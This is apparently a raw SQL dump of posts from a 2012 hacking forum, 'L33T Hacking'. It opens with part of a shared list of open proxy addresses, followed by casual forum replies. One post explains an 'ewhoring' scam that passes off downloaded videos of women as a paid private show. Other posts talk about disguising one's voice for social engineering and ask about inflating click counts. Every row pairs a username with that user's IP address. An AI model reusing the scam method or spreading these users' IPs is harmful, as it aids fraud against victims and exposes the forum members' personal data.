212.93.195.229:3128 217.219.129.20:80 217.219.129.20:3128 218.108.242.108:3128 218.16.145.109:8080 218.152.121.184:8080 218.241.153.43:8080 218.247.129.2:80 218.247.138.40:80 218.76.140.62:3128 218.63.168.253:3128 218.84.126.82:3128 218.26.251.168:1337 218.29.54.105:80 218.5.74.199:3128 219.230.71.82:3128 219.234.82.62:6666 219.234.82.62:8001 219.234.82.62:8000 219.234.82.62:8081 219.234.82.62:8085 219.133.36.198:80 218.94.1.166:82 219.234.82.62:8888 219.234.82.76:8909 219.234.82.62:8909 219.234.82.78:6666 219.234.82.78:14128 219.130.39.9:3128 219.234.82.78:80 219.234.82.78:8001 219.234.82.78:8080 219.234.82.78:8081 219.234.82.78:8085 219.234.82.62:8080 219.234.82.78:81 219.234.82.78:82 219.234.82.78:8090 219.234.82.78:83 219.234.82.78:84 219.234.82.62:8090 219.92.6.245:3128 220.225.4.250:8080 220.113.5.198:8080 219.94.243.100:8080 220.195.192.172:80 221.2.228.202:8000 221.2.174.164:8082 221.214.218.148:3128 221.229.255.50:3128 220.181.55.11:80 222.124.178.98:3128 222.127.106.89:3128 222.134.74.30:8080 222.197.181.5:3128 222.74.212.66:808 222.92.116.10:80 223.19.187.227:3128 222.74.98.234:8080 23.20.161.66:80 223.202.8.69:3128 41.189.36.26:3128 223.27.80.35:8080 41.222.209.77:8080 41.223.56.140:80 37.59.130.31:80 41.215.122.65:8080 41.75.201.146:3128 41.89.130.2:3128 41.72.213.94:8080 42.62.5.104:8080 42.62.5.104:8001 42.62.5.104:8081 42.62.5.104:6675 42.62.5.104:8000 42.62.5.104:8085 42.62.5.104:8090 42.62.5.104:8118 42.62.5.104:8888 41.78.239.194:8080 42.62.5.105:8080 42.62.5.105:8085 42.62.5.105:6675 42.62.5.105:8000 42.62.5.105:8888 42.62.5.105:8090 42.62.5.105:8001 42.62.5.105:8118 42.62.5.105:8081 42.62.5.106:8001 42.62.5.106:8080 42.62.5.106:8081 42.62.5.106:8085 42.62.5.106:8090 42.62.5.106:8118 5.9.227.148:3128 54.251.3.63:80 46.248.164.74:80 46.4.253.179:3128 58.215.177.239:3128 58.251.57.78:8001 58.215.170.154:3128 49.212.161.19:3128 46.252.244.178:3128 59.34.57.68:8080 59.125.100.113:3128 59.37.163.156:3128 59.34.1.151:8080 59.57.15.71:80 60.190.129.52:3128 60.2.227.123:3128 60.28.219.218:80 60.32.73.46:80 61.152.176.48:80 60.28.213.42:80 61.135.208.184:80 61.156.217.166:8000 61.163.197.135:8080 61.19.197.236:3128 60.6.238.66:1337 61.7.252.67:3128 61.177.121.100:8888 61.247.59.183:8080 65.111.164.53:3128 62.75.161.165:3128 69.46.99.186:80 63.238.52.89:8080 74.86.2.131:8080 65.117.207.142:3128 65.117.207.142:8081 64.62.184.25:3128 71.189.47.2:8081 76.103.101.126:3128 77.38.171.87:8080 74.208.204.187:80 79.170.50.25:80 79.101.37.138:8080 80.241.82.10:3128 79.101.37.131:8080 77.222.128.230:3128 79.101.37.133:8080 80.58.250.68:80 82.193.116.28:3128 80.88.240.24:80 80.88.240.27:80 83.212.97.172:3128 81.214.15.106:8080 85.185.157.15:8080 85.192.166.187:3128 81.82.240.204:3128 86.111.144.194:3128 88.146.161.215:3128 85.234.22.126:3128 87.98.217.114:80 91.121.58.235:3128 89.35.78.8:8080 90.150.144.46:8080 92.62.229.171:8080 94.23.56.105:80 91.120.127.127:3128 94.56.129.24:8080 94.56.135.125:80 92.242.241.81:3128 95.172.68.150:80 [/code]', '188.155.56.90', '-1130678182', '1', '0', '53', '1347980791', '1', '91fa620a502ed9ed07b311570a9b369b', '0', '1347980791'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2224', '472', '2222', '7', 'RE: School story', '0', '61', 'NXK', '1347895986', '[quote=\'R?????zo?\' pid=\'2222\' dateline=\'1347894172\'] you just SE\'ed your teacher haha, even though he might investigate about this website later.. [/quote] Id probably laugh if he does.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '7c14671eb3322a3f9dac7d79a0fb4703', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2225', '423', '1937', '9', 'RE: Earn money by Copy & Pasting', '0', '62', 'R?????zo?', '1347897262', 'im gonna try this, looks promising. I\'m just scared if it is over saturated already :P', '95.69.91.226', '1598381026', '1', '0', '0', '0', '1', 'c9f4f938b263193e2efe5732a69d4791', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2226', '465', '2194', '11', 'RE: What is ewhoring', '0', '53', 'sirchamp', '1347898147', 'Nope. Basically you just get someone who pays you if you show him a \"private show\"of you. But you just download a video of the internet and show the video of some women to the payer. And he will think the women is you and will pay you for giving him a private show. Real E-Whores do the same thing but they do the private show live in front of the webcam', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ca8aae5876c44338b236dbe82585f085', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2227', '462', '2213', '35', 'RE: Vote for LHs new logo', '0', '172', 'MistaCode', '1347900531', '[quote=\'R?????zo?\' pid=\'2213\' dateline=\'1347875229\'] [quote=\'iTzIpod\' pid=\'2198\' dateline=\'1347852424\'] :/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo. I would like to see Reloadzor try out for this though! :D Good luck everyone. [/quote] i came up with this: [img]http://i.imgur.com/VMmLc.png[/img] [hr] heres the facebook avatar (for t3h jok3r) just in case you like mine :) [img]http://i.imgur.com/qCK6A.png[/img] [/quote] Looks pretty nice, what font y used?', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '4b88559e0281a3397aa00948f43798f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2228', '388', '1781', '52', 'RE: Request for the coders group', '0', '67', 'HoverCatz', '1347902744', 'I live in norway, we dont support email sms\'s', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'd11b4dbf0a6f369f40d1707e72ea6dd6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2229', '462', '2227', '35', 'RE: Vote for LHs new logo', '0', '62', 'R?????zo?', '1347906196', '[quote=\'MistaCode\' pid=\'2227\' dateline=\'1347900531\'] Looks pretty nice, what font y used? [/quote] http://www.dafont.com/transformers-movie.font LOL', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '4af01a7f00d4118f859ca286d84fe41a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2230', '470', '2211', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '67', 'HoverCatz', '1347909290', 'Please put this in a txt file, as it takes ages to load on any i devices :)', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'a3bd0904178d4bc96ce2ec95c8fdb0db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2231', '461', '2171', '43', 'RE: some PID\'s List', '0', '82', 'iTzIpod', '1347909980', 'Thanks for the contribution. But I\'m not looking for the any of the item\'s PIDs at the moment.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fc43b16b6a314964f2eadd95c0f1c1ca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2232', '436', '1988', '7', 'RE: Motivation', '0', '82', 'iTzIpod', '1347910025', 'Yeah. JakeUS, that has happened to some members. And might happen to me. Might..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '98ff11a199c7f68bc0aa06f78c647eee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2233', '437', '1995', '3', 'RE: Help keep LH up', '0', '82', 'iTzIpod', '1347910102', 'Wait. Is it possible to get a click +1 from the same IP? Like I already clicked them before. But if I click them again, will your clicks go up?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c5db599c5725b2b4cec22a3cfa1f8d34', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2234', '363', '2189', '8', 'RE: Top 10 songs of September 2012', '0', '82', 'iTzIpod', '1347910227', '[quote=\'Romdu62\' pid=\'2189\' dateline=\'1347850406\'] Oh My SONGS You don\'t like that song by Lil Wayne. [/quote] Not sure if spamming or not.. I don\'t understand what you\'re talking a bout.. What Lil Wayne song? What do you mean \"Oh My SONGS\" Who are you talking too?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd0fc8a17b794e7f0aa17672ca0526d8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2235', '403', '2196', '18', 'RE: Youtube Bot', '0', '82', 'iTzIpod', '1347910368', '[quote=\'swa4567\' pid=\'2196\' dateline=\'1347851956\'] Can you post a screenshot please [/quote] Of the bot? If so, you gotta wait. I\'m on Mobile. I\'m sorry if I don\'t since I might forget..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '222b0ff665b240adb3d1d69a29e23b5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2236', '77', '184', '16', 'RE: Disguise your voice over Skype', '0', '82', 'iTzIpod', '1347910574', 'Works really well. Thanks for telling me about Clownfish. =] Good for SEing via Skype Calling', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'da8d7011aa5a5d44857192c3988f0e7c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2237', '468', '2204', '16', 'RE: [TUT] Free Dre Beats [Unconfirmed]', '0', '82', 'iTzIpod', '1347910606', 'I\'ve seen this method a couple times. It didn\'t work for some members on a different forum.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '755194854bda4e18a1c4f0b184a5bdbb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2238', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1347910671', '/me is trying to help t3h jok3r help LH get more active', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fd811e2c2c79e21a2480aa2449ccf0af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2239', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1347910721', 'Banned for having more rep than me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0eb65f2dc086a32fadd066afd8e925f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2240', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347910842', 'Will try this out now. Might take a while since I have loads of homework to do. [hr] EDIT: Sorry, but these are very bad.. I had to finish up my homework.. Truly sorry. Here you go Made a few. NOTE: Some of them, I messed up on. So.. yeah.. [img]http://i.imgur.com/6IrpX.png[/img] [img]http://i.imgur.com/TA6YN.png[/img] [IMG]http://i.imgur.com/X7sfo.png[/IMG] [IMG]http://i.imgur.com/6Qoo4.png[/IMG] [img]http://i.imgur.com/iLWJi.png[/img] [IMG]http://i.imgur.com/r6WJM.png[/IMG] [IMG]http://i.imgur.com/hvGIF.png[/IMG] [IMG]http://i.imgur.com/ordbC.png[/IMG] [IMG]http://i.imgur.com/sNucP.png[/IMG] [IMG]http://i.imgur.com/CWKlk.png[/IMG] [IMG]http://i.imgur.com/jXBZk.png[/IMG] [IMG]http://i.imgur.com/0pJoK.png[/IMG] @NXK, sorry :/', '24.212.197.164', '416597412', '1', '0', '82', '1347915924', '1', 'e1115cef125d716d9b00f8ade7d60aaa', '0', '1347915924'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2241', '471', '2212', '7', 'RE: L33THackers is not L33THacking', '0', '82', 'iTzIpod', '1347910914', 'I knew this already :p But other than that, thanks for the notice.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd6b80a5b8b4b9a3187096cc958f02a2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2242', '469', '2210', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '82', 'iTzIpod', '1347910961', 'When are you doing this? Like what time?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '48847fce90f8b90b2d64ffefee5b19db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2243', '443', '2217', '42', 'RE: Apple Announces the iPhone 5', '0', '82', 'iTzIpod', '1347911259', '[quote=\'??????Z\' pid=\'2217\' dateline=\'1347880872\'] try buying it in england, $700 starting price [/quote] Oh damn really? That must suck :uh yeah:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cb00389e278ce6ac5fd33b39812554cc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2244', '472', '2221', '7', 'RE: School story', '0', '82', 'iTzIpod', '1347911454', 'Lol what a close call :p Gonna reread this :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '071d119f200777e6221a61b20adb9118', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2246', '423', '1937', '9', 'RE: Earn money by Copy & Pasting', '0', '82', 'iTzIpod', '1347912711', 'It shouldn\'t be saturated. @NXK, yes I have.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ed0f3af79a760f534c447926a45e6f4d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2247', '470', '2211', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '82', 'iTzIpod', '1347912878', '@HoverCatz, I would put that in a spoiler/code, but I can\'t since I can\'t edit posts in this section. Sorry. OT: OP, you should just delete the ones that don\'t work. And post the ones that sirchamp posted. That way it doesn\'t take 10 seconds to scroll all the way down. (It doesn\'t take me 10 seconds just to scroll all the way down.. Just an expression)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0a38566f0579802776a262816989e16d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2248', '462', '2213', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1347912948', '[quote=\'R?????zo?\' pid=\'2213\' dateline=\'1347875229\'] [quote=\'iTzIpod\' pid=\'2198\' dateline=\'1347852424\'] :/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo. I would like to see Reloadzor try out for this though! :D Good luck everyone. [/quote] i came up with this: [img]http://i.imgur.com/VMmLc.png[/img] [hr] heres the facebook avatar (for t3h jok3r) just in case you like mine :) [img]http://i.imgur.com/qCK6A.png[/img] [/quote] Repped. Your GFX talent is amazing. I can\'t cook anything like that. I vote for Reloadzor\'s :p I\'m not sure if the 2nd image is broken or not.. I can\'t see it. [hr] EDIT: Nevermind. I see it. I like the first one. Although if Reloadzor\'s entry was in, I would choose Reloadzor\'s', '24.212.197.164', '416597412', '1', '0', '82', '1347913037', '1', '6403cc2a73c05dbc631d4f6ae683cf59', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2249', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '112', '??????Z', '1347913608', 'Thats awesome, yeah please make the avatar. thanks', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', 'f8b2b6b3b75f19643b2ef052779697c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2250', '462', '2248', '35', 'RE: Vote for LHs new logo', '0', '62', 'R?????zo?', '1347914632', '[quote=\'iTzIpod\' pid=\'2248\' dateline=\'1347912948\'] [quote=\'R?????zo?\' pid=\'2213\' dateline=\'1347875229\'] [quote=\'iTzIpod\' pid=\'2198\' dateline=\'1347852424\'] :/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo. I would like to see Reloadzor try out for this though! :D Good luck everyone. [/quote] i came up with this: [img]http://i.imgur.com/VMmLc.png[/img] [hr] heres the facebook avatar (for t3h jok3r) just in case you like mine :) [img]http://i.imgur.com/qCK6A.png[/img] [/quote] Repped. Your GFX talent is amazing. I can\'t cook anything like that. I vote for Reloadzor\'s :p I\'m not sure if the 2nd image is broken or not.. I can\'t see it. [hr] EDIT: Nevermind. I see it. I like the first one. Although if Reloadzor\'s entry was in, I would choose Reloadzor\'s [/quote] thanks alot. I try my best. And btw I will make you a better signature for you when I had the time, that one is way too simple I made it quickly :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1bb8aa0a77b74ba779464345e722f74a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2251', '462', '2250', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1347915590', '[quote=\'R?????zo?\' pid=\'2250\' dateline=\'1347914632\'] [quote=\'iTzIpod\' pid=\'2248\' dateline=\'1347912948\'] [quote=\'R?????zo?\' pid=\'2213\' dateline=\'1347875229\'] [quote=\'iTzIpod\' pid=\'2198\' dateline=\'1347852424\'] :/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo. I would like to see Reloadzor try out for this though! :D Good luck everyone. [/quote] i came up with this: [img]http://i.imgur.com/VMmLc.png[/img] [hr] heres the facebook avatar (for t3h jok3r) just in case you like mine :) [img]http://i.imgur.com/qCK6A.png[/img] [/quote] Repped. Your GFX talent is amazing. I can\'t cook anything like that. I vote for Reloadzor\'s :p I\'m not sure if the 2nd image is broken or not.. I can\'t see it. [hr] EDIT: Nevermind. I see it. I like the first one. Although if Reloadzor\'s entry was in, I would choose Reloadzor\'s [/quote] thanks alot. I try my best. And btw I will make you a better signature for you when I had the time, that one is way too simple I made it quickly :) [/quote] It still looks nice. Don\'t worry you don\'t have too.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '22b637a8f048e6ea0c29ab27679d4059', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2252', '473', '0', '7', '1 Week within 1 Month', '0', '82', 'iTzIpod', '1347916175', 'Hey LH, Starting on the 20th, that will be my 1 month registered of iTzIpod. I made this L33t Hacking account back in 08-20-2012 (August 20, 2012) And in 3 more days, it will be 09-20-2012 (September 20, 2012) I\'m really excited :3 I don\'t see why.. But I am :p Also, I noticed that I have 1 Week Time Spent Online. I feel very proud. I get a cookie. (Just a Milestone Thread) LH has been a blast. I didn\'t regret registering on it. - iTzIpod', '24.212.197.164', '416597412', '1', '0', '82', '1347924070', '1', '542ecceefe3361e3a24a98fb00d6cad9', '0', '1347924070'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2253', '473', '2252', '7', 'RE: 1 Week within 1 Month', '0', '188', 'Lonnie', '1347923747', 'Congrats bro! What are you doing for your birthday?', '68.83.86.251', '1146312443', '0', '0', '0', '0', '1', '71ca2ef03418ba4b0a2b83f8e232d8ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2254', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '188', 'Lonnie', '1347924028', 'rock,techno,dubstep,pop,trance', '68.83.86.251', '1146312443', '0', '0', '0', '0', '1', '8b821659c20bf57ab4642f381c5abf53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2255', '473', '2252', '7', 'RE: 1 Week within 1 Month', '0', '82', 'iTzIpod', '1347924039', 'LOL sorry. I guess I didn\'t explain it correctly.. I meant it\'s like a birthday since I will almost be registered on this forum for 1 month now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3b475f91f62a355c13baebd79adc1584', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2256', '171', '2254', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1347924116', '[quote=\'Lonnie\' pid=\'2254\' dateline=\'1347924028\'] rock,techno,dubstep,pop,trance [/quote] I seriously never heard of \"trance\" I\'m going to Google that right now :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e6c5ec3c92f0126379af3ac82e4cc88a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2257', '439', '2197', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1347924310', '[quote=\'swa4567\' pid=\'2197\' dateline=\'1347851990\'] What are the requirements? [/quote] Please wait until I am finished updating the thread :/ I\'m really busy at the moment.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fa7cdeaec9c4df8b0da6f17017caef2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2258', '435', '1984', '4', 'RE: Newbie Here', '0', '20', 'JakeUS', '1347927900', 'Welcome to the site! Enjoy your stay.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'f2e4fbe50b185ec7d758ba889772b8fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2259', '469', '2242', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '1', 't3h jok3r', '1347929148', '[quote=\'iTzIpod\' pid=\'2242\' dateline=\'1347910961\'] When are you doing this? Like what time? [/quote] In a couple of hours', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9fc14ea007eefcba2375ab854834d8b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2260', '469', '2259', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '82', 'iTzIpod', '1347929239', '[quote=\'t3h jok3r\' pid=\'2259\' dateline=\'1347929148\'] [quote=\'iTzIpod\' pid=\'2242\' dateline=\'1347910961\'] When are you doing this? Like what time? [/quote] In a couple of hours [/quote] Alright done. I saved my important PMs.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ec84378d82926aab5973a6dd2af14249', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2261', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1347934466', 'Stickied .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3da5efc573910a540382e92522aa924e', '0', '0'); INSERT INTO `mybb_posts` 